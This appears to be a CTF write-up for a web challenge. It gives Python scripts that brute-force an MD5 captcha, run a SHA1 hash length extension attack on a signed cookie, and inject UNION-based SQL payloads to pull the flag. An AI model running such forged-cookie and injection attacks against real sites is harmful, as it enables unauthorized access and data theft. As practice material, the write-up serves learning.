SecuritySystem

题目描述：This is the Security System, no hacker can take over it.Now maybe u can find some vul for this system. Take it easy…

1. 破解验证码 getCaptch.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import hashlib

target = "3aab4a"

for length in range(4, 8):
    for captcha in range(10 ** (length - 1), 10**length):
        if hashlib.md5(str(captcha).encode()).hexdigest()[:6] == target:
            print(captcha)

注册后进入主页面，取到的关键信息如下：

user='dXNlcg=='                                  # base64
auth='0ace2c1e9e93134965974f60e05716d2ba5ebf0e'  # 哈希值
PHPSESSID='kabduh8972c8g2m9lu3086ad14'           # PHP 会话标识符

2. 确定密钥长度 getKeyLen.py

使用哈希长度扩展攻击，推测出长度为 14 位。

# !/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
import re

# https://github.com/viensea1106/hash-length-extension
# pip install length-extension-tool
import HashTools
import requests


def main():
    key_len = 1  # 初始化密钥长度
    user = "user"  # 用户名
    append = "hack"  # 要追加的字符串
    auth = "0ace2c1e9e93134965974f60e05716d2ba5ebf0e"  # 已知的哈希值
    PHPSESSID = "ul81cinqvo9r70fghdphi4qa37"  # 会话 ID
    url = "http://eci-2zecb56v9wzd32pvr7ih.cloudeci1.ichunqiu.com/index.php"  # 目标 URL

    while True:
        # 使用 HashTools 进行哈希长度扩展攻击
        magic = HashTools.new("sha1")
        new_data, new_hash = magic.extension(
            secret_length=key_len,
            original_data=user.encode(),
            append_data=append.encode(),
            signature=auth,
        )

        # 将新数据转换为 Base64 编码
        new_user_b64 = base64.b64encode(new_data).decode("utf-8")

        # 准备 cookies 并发送请求
        cookies = {"auth": new_hash, "user": new_user_b64, "PHPSESSID": PHPSESSID}
        response = requests.get(url, cookies=cookies).text

        # 匹配页面响应
        match = re.findall(r"Welcome (.*)</p>", response)
        if match:
            print(f"找到匹配项！密钥长度：{key_len}")
            break
        else:
            print(f"密钥长度 {key_len} 尝试失败，尝试下一个长度...")
        key_len += 1


if __name__ == "__main__":
    main()

3. 获取 Flag getFlag.py

使用 payload 构造 user 进行 SQL 注入，成功获取 flag。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import base64
import re

# https://github.com/viensea1106/hash-length-extension
# pip install length-extension-tool
import HashTools
import requests

user = "user"
auth = "0ace2c1e9e93134965974f60e05716d2ba5ebf0e"
PHPSESSID = "ul81cinqvo9r70fghdphi4qa37"
url = "http://eci-2zecb56v9wzd32pvr7ih.cloudeci1.ichunqiu.com/index.php"
keyLen = 14
s = requests.session()

payloads = [
    "' UNION SELECT 1,2#",  # 测试列数
    "' UNION SELECT database(),2#",  # 获取当前数据库名
    "' UNION SELECT GROUP_CONCAT(table_name SEPARATOR ', '), 2 FROM information_schema.tables WHERE table_schema=database()#", # 获取所有数据表
    "' UNION SELECT flag,2 FROM flag LIMIT 1#" # 获取 flag
]

for payload in payloads:
    magic = HashTools.new("sha1")
    new_data, new_hash = magic.extension(
        secret_length=keyLen,
        original_data=user.encode(),
        append_data=payload.encode(),
        signature=auth,
    )
    new_user_b64 = base64.b64encode(new_data).decode("utf-8")
    cookies = {"auth": new_hash, "user": new_user_b64, "PHPSESSID": PHPSESSID}

    response = s.get(url, cookies=cookies).text
   
    interest = re.findall(r"interest:(.*?)</p>", response)
    dream = re.findall(r"dream:(.*?)</p>", response)
    print(f"Payload: {payload}")
    print(f"result1: {interest[0]}")
    print(f"result2: {dream[0]}")
    print("-" * 100)